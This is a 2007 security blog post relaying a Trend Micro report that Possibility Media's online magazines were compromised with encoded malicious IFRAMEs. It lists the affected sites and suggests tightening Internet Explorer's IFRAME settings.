Spyware Sucks
“There is no magic fairy dust protecting Macs" – Dai Zovi, author of “The Mac Hacker’s Handbook"

Danger – Possibility Media web sites compromised

October 27th 2007 in Uncategorized

Source: http://blog.trendmicro.com/malicious-iframes-hosted-on-e-zines-a-media-possibility/

Note: Possibility Media has been bought out by GM Media Worldwide

A handful of online magazines (e-zines) owned by Possiblity Media, some of which are related to IT, are hosting malicious IFRAMEs. Security Researcher Dancho Danchev shared this discovery with the rest of the security community. Some of the e-zines that are hosting malicious IFRAMEs are:

  • webweekmag.com – Web Week Magazine (site unavailable at time of writing)
  • itweekmagazine.com – IT Week Magazine
  • technologyweekmag.com – Technology Week Magazine
  • theinternetstandardmag.com – The Internet Standard
  • securitystandardmag.com – Security Standard

Danchev notes that there are a total of 24 e-zines, all of which are owned by Possibility Media, that have malicious IFRAMEs embedded in them. Trend Micro threat analyst Jonell Baltazar checked some of the e-zines’ URLs and was able to obtain different binary files that are detected by Trend Micro products as PAK_GENERIC and POSSIBLE_STRAT-6. Other files are now under analysis.

Some more affected sites include:

networkweekmag.com – Network Week Magazine (site unavailable at time of writing)
portablecomputingmag.com – Portable Computing Magazine
businesscomputingmagazine.com – Business Computing Magazine
communicationsworldmag.com – Communications World Magazine
communicationsweekmag.com – Communication Week Magazine
ipworldmag.com – IP World Magazine
networkweekmag.com – Network Week Magazine
thebestpcmag.com – The Best PC
theitstandard.com – The IT Standard
hostingweekmag.com – Hosting Week (site unavailable at time of writing)
enterpriseweekmag.com – Enterprise Week
computernewsmagazine.com – Computer News
ceweekmag.com – CE Week Magazine
ebusinessmag.com – Ebusiness Magazine
healthcareitmagazine.com – Health Care IT Magazine

Some of the sites have hyperlinks to xaknet.ru added.

The bad guys have encoded the script in question, as follows.  A peak at the source of the itweekmagazone.com home page reveals:

image

Which when translated reveals:

image

iframes are extremely popular with the low-life’s that are hacking into and compromising web sites.  It would be well worth your while to check your users’ iframe security settings.  By default, IE7 sets “launching programs and files in an IFRAME” to prompt, as you can see below.  You may feel that it is better in the current environment to disable that option – after all, too many users will simply click ‘yes’ if prompted.

image


Comments are closed.

This problem occurs when you configure the Remote Desktop Connection to use the “256 colors” display mode.
http://support.microsoft.com/default.aspx/kb/935560

Previous Entry

Courtesy of Qantas Club Lounge, Sydney – a nice STOP error….

Next Entry

Archives